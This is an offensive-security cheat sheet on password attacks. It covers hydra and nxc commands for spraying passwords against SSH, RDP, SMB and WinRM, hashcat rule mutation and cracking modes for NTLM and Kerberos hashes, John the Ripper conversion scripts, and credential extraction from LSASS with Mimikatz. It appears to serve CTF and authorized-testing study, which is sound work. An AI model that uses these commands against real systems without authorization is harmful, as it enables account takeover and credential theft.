Password Attacks

Password Spraying

Scenario	Command
SSH	`hydra -L users.txt -p $PASSWORD ssh://$TARGET`
RDP	`hydra -L users.txt -p $PASSWORD rdp://$TARGET`
SMB	`nxc smb $TARGET -u users.txt -p $PASSWORD --no-bruteforce`
WinRM	`nxc winrm $TARGET -u users.txt -p $PASSWORD --no-bruteforce`

Reference: https://www.hackthebox.com/files/cheatsheet-using-crackmapexec.pdf

Mutating Wordlists (Hashcat Rules)

When the target has a password policy (e.g., uppercase, special character, number), mutate your wordlist to match.

Rule Syntax

Function	Description	Example
`$X`	Append character X	`$1` appends "1"
`^X`	Prepend character X	`^3` prepends "3"
`c`	Capitalize first letter

Applying Rules

Preview the mutations without cracking:

hashcat -r demo.rule --stdout wordlist.txt

Same line = consecutive rules on one password. Separate lines = separate mutations (multiplies the wordlist):

# demo1.rule (both applied to each password)
$1 c
# Result: Password1, Iloveyou1, Princess1

# demo2.rule (each applied separately)
$1
c
# Result: password1, Password, iloveyou1, Iloveyou...

Example: Meeting a Password Policy

For a policy requiring uppercase + special char + number:

$1 c $!
$2 c $!
$1 $2 $3 c $!

Cracking with Rules

hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt -r rules.rule --force

Built-in Hashcat Rules

Located in /usr/share/hashcat/rules/:

best64.rule — most commonly effective
rockyou-30000.rule — comprehensive
d3ad0ne.rule — large rule set

Cracking Methodology

Extract hashes from the target
Identify hash type using hash-identifier or hashid
Format hashes for your cracking tool (use john's *2john scripts if needed)
Calculate cracking time to choose the right approach
Attack the hash

warning

hash-identifier can't always distinguish between MD2, MD4, and MD5. Double-check with other tools and context about where the hash came from.

Common Hash Types

Source	Hashcat Mode	Tool
NTLM	`-m 1000`	`hashcat`
NetNTLMv2	`-m 5600`	`hashcat`
Kerberoast (TGS)	`-m 13100`	`hashcat`
AS-REP	`-m 18200`	`hashcat`
SHA-512 (Linux)	`--format=sha512crypt`	`john`

JtR Format Conversion Scripts

The John the Ripper suite includes transformation scripts for various file formats:

ssh2john — SSH private keys
keepass2john — KeePass databases
zip2john — ZIP files

These scripts can also format hashes for Hashcat.

Hydra

SSH brute force:

hydra -t 1 -l $USER -P /usr/share/wordlists/rockyou.txt -s 22 ssh://$TARGET

Windows Stored Credentials

LSASS caches NTLM hashes and other credentials. It runs as SYSTEM, so you need Administrator or higher privileges plus SeDebugPrivilege to extract credentials.

You can elevate to SYSTEM using PsExec or Mimikatz's token elevation function (requires SeImpersonatePrivilege, which all local admins have by default).

Credentials are stored when:

Users log on interactively
Services run with user accounts
Scheduled tasks use stored credentials

Password Spraying​

Mutating Wordlists (Hashcat Rules)​

Rule Syntax​

Applying Rules​

Example: Meeting a Password Policy​

Cracking with Rules​

Built-in Hashcat Rules​

Cracking Methodology​

Common Hash Types​

JtR Format Conversion Scripts​

Hydra​

Windows Stored Credentials​